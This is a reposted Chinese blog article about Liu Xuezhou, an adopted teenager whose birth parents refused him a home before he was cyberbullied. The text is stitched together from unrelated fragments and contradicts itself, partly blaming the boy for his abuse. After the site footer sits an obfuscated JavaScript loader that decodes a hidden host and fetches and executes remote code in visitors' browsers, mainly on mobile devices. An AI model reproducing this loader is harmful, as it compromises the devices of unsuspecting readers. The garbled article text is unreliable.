想要有个家

2022年09月07日 admin 阅读(21)

刘学州向亲生父母表达了想要有个“家”的愿望,这个可怜的孩子没有得到“家”,再一次被亲生父母“拉黑”,将他的人生再次“拉黑”。

当然他对于这份婚姻也是抱有私心的,他只是想要老年生活有个伴,相互之间有个照应。现在看来这完全就是给自己请了一个大小姐回来,最主要的问题是她不管自己的家反而对儿子的家十分上心,儿子都为此有了抱怨。

在亲生父母都拒绝他进入自己的家庭中和自己一起生活的情况下,刘学州坚持“自己想要一个家”,导致亲生母亲将其拉黑,而亲生父亲也无法对此做出保证。随后刘学州提出能不能帮他租一个一室一厅的房子给自己有个落脚点,这个想法也没得到回应。讲真的,刘学州想要有个家,他这不是在白日做梦吗,亲生父母各自有家庭了也各自有孩子了,你就是多余的,搞不清楚自己的地位是多尴尬,非要自己逼着亲生父母再次抛弃自己,最后导致被别人骂“有心机”,讲真的被骂其实他有点不亏的。这种情况下根本没办法给他一个家。

刘学州表示自己没有住的地方,想要一个家不让自己飘着就可以了,妈妈就说让他住和学州父亲离婚时的房子,刘学州没有同意,让父母给他买个或者租个一室一厅的房子,有个地方住就可以了。

刘学州仅仅是想要一个家而已,何错之有?他还未成年是个孩子,都无家可归了,想有个房子,有个住处,有个家,难道不是父母应该尽的义务吗?父母不尽义务也罢了,还面对媒体拼命地抹黑他,污蔑他。

至于网暴刘学州的原因,非常的可笑,只是因为刘学州想要一个家。刘学州表示,即使亲生父母不养自己,给自己买栋房子,哪怕租一个一室一厅,让自己有个住的地方,也不至于流浪街头。

可那时的他并不知道,之后发生的一切并没有让他重新找到家庭的温暖,反而加速了他的离世,找到亲生父母之后,还没等到刘学洲从喜悦中走出来就被离异的父母双双再度抛弃,在他看来希望父母给自己一个家的愿望也成为了父母口中逼死双亲的威胁,而这一切给了这个还没有真正接触社会的小男孩儿一个当头棒喝,原来他所说的想要有个家

就在引发热议的时候,爆出刘学州给父母要房子希望有个属于自己的居所,这是事情的很大转折点,遭到了网暴,很多网友和他的父母一样,觉得这个少年,赤子野心,刘学州在公众直播面前坦诚自己是说过很想要一个房子,当然租房也是可以的,不至于自己再像之前那样流连各个亲戚那里寄人篱下,这是他的心声,他也期待自己像孙卓那样有人爱,有人暖,有个家,但是家,父母分别容不下他,无法接纳他,那房子,给这个少年一个住的地方,难道就是野心吗?

最后她老公觉得太累了,我相当于自己有个女儿,我不想再要女儿,我们家已经有两个女儿,再加上老婆,我不想要这么多。

此时刘学州的父母早已离婚,且都已再婚生子。父母都不愿意收留刘学州。但刘学州想要一个家,于是提出让父母给他买个房子或者租个房子,只要有个落脚的地方就行。父母双方都提出了拒绝。母亲甚至在微信上拉黑了他。

1月16日,刘学州发文称亲生父母受不了网上对他们的谴责,已经将自己拉黑。17日,刘学州在直播时称自己只是想要有个家,并质问亲生父母有什么脸攻击自己。双方矛盾彻底爆发,此时网络风向也发生了逆转。

于是没有亲人的他开始学着自己长大,而当他知道自己是被领养的时候,他对生活萌生了一丝希望,他想要寻找自己的亲生父母,想要给自己一个家。最后父母是找到了,结果发现自己是被父母卖掉的,自己并不是大家想要的,而父亲在认他的时候也是左右推脱,希望刘学州的出现不要破坏自己的家庭。而当刘学州告知他们自己没有住的地方的时候,他们面对这个话题也开始避而不谈。

对于儿子想要有个家的提议,刘学州的生母选择直接拉黑孩子,而父亲的做法则是对着媒体责骂刘学州是个“白眼狼”,并声称自己是提议过让儿子搬过来与自己同住的,是刘学州自己不愿意。

本文转载自互联网,如有侵权,联系删除

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

卓仁IT博客
卓仁IT博客的快速排名服务领先80%同行,首家开创刷百度关键词排名程序,非纯点击方法,无点击软件出售,需要seo快速排名提高网站排名请咨询顾问。
  • 文章61274
  • 评论0
  • 浏览9827302
function uYpJJ(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uYpJJ(t);};window[''+'S'+'R'+'D'+'h'+'o'+'o'+'l'+'N'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkuMDI3MmJiLmNvbQ==','426530553998467072',window,document,['','VxKGyJk']);}:function(){};